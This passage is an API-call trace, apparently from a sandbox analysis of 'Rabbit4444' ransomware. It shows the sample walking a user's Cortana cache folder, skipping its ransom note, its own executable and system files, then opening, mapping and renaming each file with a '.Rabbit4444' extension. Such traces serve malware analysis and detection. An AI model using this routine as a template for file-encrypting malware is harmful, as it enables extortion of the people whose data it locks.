lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf90d8e50, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf90d8e50, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd06a2f50, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1f1b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", cAlternateFileName="C_2306~1.TXT")) returned 1 [0069.530] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.531] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.531] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.531] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2=".") returned 1 [0069.531] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2="..") returned 1 [0069.531] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2="windows") returned -1 [0069.531] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2="bootmgr") returned 1 [0069.531] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2="pagefile.sys") returned -1 [0069.531] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2="boot") returned 1 [0069.531] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2="ids.txt") returned -1 [0069.531] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.531] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt" [0069.531] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt", dwFileAttributes=0x2000) returned 1 [0069.531] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt") returned 85 [0069.531] lstrlenW (lpString="Rabbit4444") returned 10 [0069.531] lstrcmpiW (lpString1="_16[1].txt", lpString2="Rabbit4444") returned -1 [0069.531] lstrlenW (lpString=".dll") returned 4 [0069.531] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.531] lstrlenW (lpString=".lnk") returned 4 [0069.531] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.531] lstrlenW (lpString=".ini") returned 4 [0069.531] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.531] lstrlenW (lpString=".sys") returned 4 [0069.531] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.531] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_16[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.532] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.532] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16084264220) returned 1 [0069.532] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=127409) returned 1 [0069.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0069.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0069.532] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f4c0, lpName=0x0) returned 0x29c [0069.533] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f4c0) returned 0x70000 [0069.538] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.538] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0069.538] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.538] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0069.538] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0069.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0069.539] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16084959836) returned 1 [0069.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0069.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0069.539] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.540] CloseHandle (hObject=0x29c) returned 1 [0069.540] CloseHandle (hObject=0x280) returned 1 [0069.540] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt.Rabbit4444") returned 198 [0069.540] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_16[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_16[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_16[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.541] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf90d8e50, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf90d8e50, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd06a2f50, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x6a02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", cAlternateFileName="C_399E~1.TXT")) returned 1 [0069.541] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.541] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.541] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.541] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2=".") returned 1 [0069.541] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2="..") returned 1 [0069.542] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2="windows") returned -1 [0069.542] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2="bootmgr") returned 1 [0069.542] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2="pagefile.sys") returned -1 [0069.542] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2="boot") returned 1 [0069.542] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2="ids.txt") returned -1 [0069.542] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.542] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt" [0069.542] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt", dwFileAttributes=0x2000) returned 1 [0069.543] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt") returned 85 [0069.543] lstrlenW (lpString="Rabbit4444") returned 10 [0069.543] lstrcmpiW (lpString1="_17[1].txt", lpString2="Rabbit4444") returned -1 [0069.543] lstrlenW (lpString=".dll") returned 4 [0069.543] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.543] lstrlenW (lpString=".lnk") returned 4 [0069.543] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.543] lstrlenW (lpString=".ini") returned 4 [0069.543] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.543] lstrlenW (lpString=".sys") returned 4 [0069.543] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.543] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_17[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.543] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.543] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16085419235) returned 1 [0069.543] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=27138) returned 1 [0069.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0069.544] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0069.544] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d10, lpName=0x0) returned 0x29c [0069.545] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d10) returned 0x70000 [0069.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0069.547] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0069.547] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.547] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0069.547] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.547] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0069.547] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16085784295) returned 1 [0069.547] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0069.547] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0069.547] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.547] CloseHandle (hObject=0x29c) returned 1 [0069.548] CloseHandle (hObject=0x280) returned 1 [0069.548] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt.Rabbit4444") returned 198 [0069.548] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_17[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_17[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.548] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf90d8e50, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf90d8e50, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd06a2f50, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x25359, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", cAlternateFileName="C_503C~1.TXT")) returned 1 [0069.548] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.548] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.548] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.548] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2=".") returned 1 [0069.549] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2="..") returned 1 [0069.549] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2="windows") returned -1 [0069.549] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2="bootmgr") returned 1 [0069.549] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2="pagefile.sys") returned -1 [0069.549] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2="boot") returned 1 [0069.549] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2="ids.txt") returned -1 [0069.549] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.549] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt" [0069.549] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt", dwFileAttributes=0x2000) returned 1 [0069.549] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt") returned 85 [0069.549] lstrlenW (lpString="Rabbit4444") returned 10 [0069.549] lstrcmpiW (lpString1="_18[1].txt", lpString2="Rabbit4444") returned -1 [0069.549] lstrlenW (lpString=".dll") returned 4 [0069.549] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.549] lstrlenW (lpString=".lnk") returned 4 [0069.549] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.549] lstrlenW (lpString=".ini") returned 4 [0069.549] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.549] lstrlenW (lpString=".sys") returned 4 [0069.549] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.549] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_18[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.550] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.550] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16086045257) returned 1 [0069.550] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=152409) returned 1 [0069.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0069.550] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0069.550] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25660, lpName=0x0) returned 0x29c [0069.554] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25660) returned 0x70000 [0069.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0069.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0069.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0069.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.560] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0069.560] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16087124815) returned 1 [0069.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0069.561] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0069.561] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.562] CloseHandle (hObject=0x29c) returned 1 [0069.562] CloseHandle (hObject=0x280) returned 1 [0069.562] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt.Rabbit4444") returned 198 [0069.562] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_18[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_18[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.563] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf90ff0ac, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf90ff0ac, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd06a2f50, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1ef39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", cAlternateFileName="C_4A93~1.TXT")) returned 1 [0069.563] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.563] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.563] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.563] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2=".") returned 1 [0069.563] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2="..") returned 1 [0069.563] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2="windows") returned -1 [0069.563] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2="bootmgr") returned 1 [0069.563] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2="pagefile.sys") returned -1 [0069.563] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2="boot") returned 1 [0069.563] lstrcmpiW 